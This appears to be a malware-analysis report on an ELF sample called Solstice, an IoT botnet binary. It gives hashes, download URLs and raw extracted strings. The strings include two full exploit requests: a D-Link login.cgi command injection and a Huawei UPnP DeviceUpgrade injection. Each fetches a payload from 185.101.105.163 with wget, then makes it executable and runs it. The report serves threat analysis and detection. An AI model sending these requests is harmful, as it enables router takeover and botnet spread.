Sample details: ac29908a0d3df431e1e57ba7e44e9424

Hashes
MD5: ac29908a0d3df431e1e57ba7e44e9424
SHA1: 75103cb685c7af94eb7f60e700bcab92d23c4af5
SHA256: 71be4a069039d14903ad69362f8746dcadc07a956dae855b83d2da1bbddb8b43
SSDEEP: 1536:U+2pO3TgJjuWu+hDkgajHCXyUDUpJ9RXGKDtJ9T1:T2VAjHCXbD2J9QK7f
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163/bins/Solstice.spc
http://185.101.105.162/bins/Solstice.spc
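Strings (raw extraction from the sample; the short entries ending in `"` appear to be single-byte XOR-encoded with key 0x22, so the trailing `"` would be an encoded NUL terminator; verify before relying on them for signatures)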
		POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
?/dev/null
.shstrtab
.rodata
.ctors
.dtors